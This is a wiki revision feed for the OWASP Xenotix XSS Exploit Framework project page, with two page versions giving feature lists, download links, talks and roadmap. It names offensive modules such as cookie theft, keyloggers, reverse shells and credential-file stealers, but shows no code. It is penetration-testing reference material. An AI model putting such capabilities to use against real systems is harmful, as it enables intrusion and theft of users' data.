&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
MD5: 69b96d2a66f7dffeaa8a7c7926278042&lt;br /&gt;
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar&lt;br /&gt;
MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Xen6.png&amp;diff=182352</id>
		<title>File:Xen6.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Xen6.png&amp;diff=182352"/>
				<updated>2014-09-14T15:17:24Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Dwd.png&amp;diff=182347</id>
		<title>File:Dwd.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Dwd.png&amp;diff=182347"/>
				<updated>2014-09-14T15:01:38Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=177804</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=177804"/>
				<updated>2014-06-30T04:43:06Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: added xss protection cheat sheet for developers&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 5==&lt;br /&gt;
&lt;br /&gt;
[[Image:XenotixV5.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*POST Request Scanner&lt;br /&gt;
*Request Repeater&lt;br /&gt;
*URL Fuzzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
*Browser Fingerprinting&lt;br /&gt;
*Browser Features Detector&lt;br /&gt;
*Get Network IP&lt;br /&gt;
*Ping Scan&lt;br /&gt;
*Port Scan&lt;br /&gt;
*Internal Network Scan&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Phisher&lt;br /&gt;
*Tabnabbing&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*Gram WebCam Screenshot&lt;br /&gt;
*Executable Drive By&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Drive-By Reverse Shell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Firefox Reverse Shell Addon (Persistent)&lt;br /&gt;
*Firefox Session Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Keylogger Addon (Persistent)&lt;br /&gt;
*Firefox DDoSer Addon (Persistent)&lt;br /&gt;
*Firefox Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Download and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''UTILITY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Payload Encoder&lt;br /&gt;
*JavaScript Beautify&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
